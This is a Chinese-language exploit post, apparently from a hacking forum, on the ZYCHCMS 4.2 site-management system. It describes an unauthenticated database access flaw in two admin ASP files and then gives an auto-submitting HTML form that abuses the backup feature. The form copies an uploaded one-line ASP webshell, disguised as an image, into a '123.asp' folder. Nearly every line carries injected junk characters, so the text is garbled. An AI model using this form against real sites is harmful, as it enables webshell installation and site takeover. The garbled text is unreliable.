9 a! z B/ e9 m9 A7 T+ d
r( a2 r5 w4 E, D- q/ w. I. K% i; Q1 t9 ^$ t$ V
3 I+ N3 h, x6 [9 q$ Q& P% [" I; S影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)# A2 s& O* h: [0 ?% j+ n7 M: L" z v
①SQL注射漏洞: g- V" V" \) K: e7 T7 A8 r
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp0 x* z- b( F! p& h1 q# l$ o+ {1 v
漏洞原因:未过滤6 x8 q, A6 } `) r' r7 d; r# E
漏洞代码:) G1 K9 O) M% E# A" J
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。# j ?# i/ z3 t5 p
修复方法:在文件开头加入代码
. K4 i5 ?8 i1 x% z7 A( [7 P* {: A
" S' J0 ? v3 n3 E N
: ^. b* _; D) {5 W②后台拿WBSHELL K$ q; Z; E, y
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
3 s& P, m8 C5 D2 b" ~5 x8 n; ^5 b 这里在网上找了一个,改了下,将就着用。
. x' N- d! |9 H 以下是代码本地提交代码
( \2 R7 b; r& g5 c( }- r( I
/ s% `7 a# G8 H9 T: i; |1 A% b( H, [: S% ]2 {
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>- ]9 O" O( M- y& l4 w0 Z( l# w
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>7 U4 [- V0 q" M- r+ Z8 h
<tr>$ O. U. L# K& W% ]+ F
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
: G) [# H' d& _' J9 ?+ F </tr># I8 V9 M* f* ~0 J3 D
<tr>% X6 f% y% ^1 b& n0 K n) S' B
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>9 h2 f' s% S' \) s
</span>- f) x6 n8 Y0 E$ Y, s1 O6 S
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
0 V' n) u% B; H* W% Y( z <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >3 w5 m( v7 i) A) U
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
( c' h; y% d: g' J5 W <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
- H4 x6 A3 m1 t5 S( c <div align=”left”>
L4 ~8 ^* u; x ~) U <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
& x7 e* g% i7 K( k# g <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>& z$ Z3 V% E5 v. ?1 i1 H1 p+ N+ d8 d
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
! h( v7 W$ L) g% D </div></td>- \5 r9 k- M2 G3 g! p# v+ X# Y) C
</tr>& E7 O. O+ {9 H
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
" d A- u+ {' |+ ]7 ~6 ]( D <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>/ X; |; s7 L) n" M: `+ T
<td class=”td”><div align=”left”>; |+ H! o/ b% ?( `. z
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
9 z- q# t& Q; c1 c" ~6 |% ^; Z3 H [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
/ m' _1 P6 ~; j7 ^9 q0 Z </tr>
+ X, U6 p2 ?5 v- b8 y- F: b( t+ D8 L <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
$ l9 e: x! b. k- J <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
9 u+ T% G+ b$ @& V" K <td class=”td”><div align=”left”>' y6 m+ {& J' C0 d
<input type=”submit” value=”确定备份” class=”btn”$ i! S2 m* ^+ X: [2 |* Y4 h
</div></td>: K4 ^) t2 H8 t0 f7 @* ]
</tr>5 R0 m4 y& O/ v
</table></td></tr></form>9 ~2 ~' D4 k: z0 e3 v) s6 F( m
</table>
4 P! b& j' q; X& i8 ^% q </td>/ t( V; r! t# Q% e5 |4 Z, R
</tr>
; K" _& n2 x4 [" d </table>! K: w) n" l0 [" Q% C* z# w
<script>
" t8 [% M& S6 |2 E document.all.add.submit();
5 \/ G/ r! v' a, y </script>
. t6 }8 O* x8 e, c5 s & i- W9 n& J9 M" \* |3 E1 t. F# _
$ O' T) a4 } s. b; R, V5 m, d
+ j: k, ?6 O! N2 J, X1 b
# s: E9 c6 L% ?) V" |1 V: d
, R( f [, E& A2 ?$ M6 R$ O' g8 G% `' L1 D
! ?4 q* Z/ O# i" m% Y! E
5 Q7 A. A6 L! i1 `" F) M5 ]4 v2 E% c
% q n' }8 A/ i7 J# E4 N, H0 N0 W
|